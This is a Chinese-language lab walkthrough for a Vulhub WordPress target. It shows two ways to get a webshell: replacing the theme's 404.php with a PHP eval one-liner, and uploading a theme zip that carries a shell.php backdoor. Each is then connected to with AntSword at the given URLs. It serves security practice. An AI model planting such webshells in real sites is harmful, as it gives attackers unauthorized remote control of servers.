当前位置: 首页 > news >正文

Vulhub-wordpress通关攻略

news 来源:原创 2025/5/23 15:47:03

        姿势一、后台修改模板拿WebShell

        第一步:进⼊Vulhub靶场并执⾏以下命令开启靶场;在浏览器中访问并安装好....

        第二步:找到外观--编辑--404.php,将原内容删除并修改为一句话木马,点击更新--File edited successfully.

<?php eval($_POST[cmd]);?>
        第三步:找到404.php的路径,使用蚁剑进行连接

#URL地址
http://47.103.81.25:8080/wp-content/themes/twentyfifteen/404.php

        姿势二、上传主题拿WebShell

        第一步:找到外观--主题--添加--上传主题--浏览---现在安装

        第二步:在网站上搜索WordPress主题免费下载,将后门文件shell.php加入后压缩为webshell.zip文件,上传

        第三步:使用蚁剑进行连接

http://47.103.81.25:8080/wp-content/themes/webshell/shell.php

                                                                                                                                FROM  IYU_

相关文章:

  • 【LangChain入门 6 Chain组件】单链和多链
  • 微信小程序的业务域名配置(通过ingress网关的注解)
  • Java 中处理邮件附件:本地文件 vs 在线 URL
  • 产业观察:ASML2025.3.21
  • Git(12)GitLab持续集成(CICD)
  • 用ArcGIS做一张符合环评要求的植被类型图
  • [过程记录] 《分寝室》 一题做法思考
  • 基于springboot的教务系统(源码+lw+部署文档+讲解),源码可白嫖!
  • 《模型思维》第二十三章 “与集体行动有关的问题” 总结
  • LLM之向量数据库Chroma milvus FAISS
  • AI+视频赋能智慧农业:EasyCVR打造全域可视化农场监管平台
  • AI日报 - 2025年3月20日
  • 《Java核心三问:字符串、equals()、hashCode()的隐藏雷区与完美避坑手册》
  • UltraSearch一键直达文件,高效搜索新体验
  • 双指针算法-day14(分组循环)
  • java数据结构之双端对列
  • 力扣刷题——25.K个一组翻转链表
  • 【全国产化主板】解决方案探讨:CPU、FPGA、GPU、AI的融合与优化
  • 【最后203篇系列】020 rocksdb agent
  • 《视觉SLAM十四讲》ch13 设计SLAM系统 相机轨迹实现
  • 网站的交互设计包括哪些/搜索风云榜
  • 河南靠谱网站建设推荐/外贸seo推广
  • 房产类网站建设费用/南昌seo优化
  • 上海做公司网站的公司/深圳关键词
  • 南京 推广 网站建设/免费网络推广方式
  • 自考都到哪个网站找题做/电商网站大全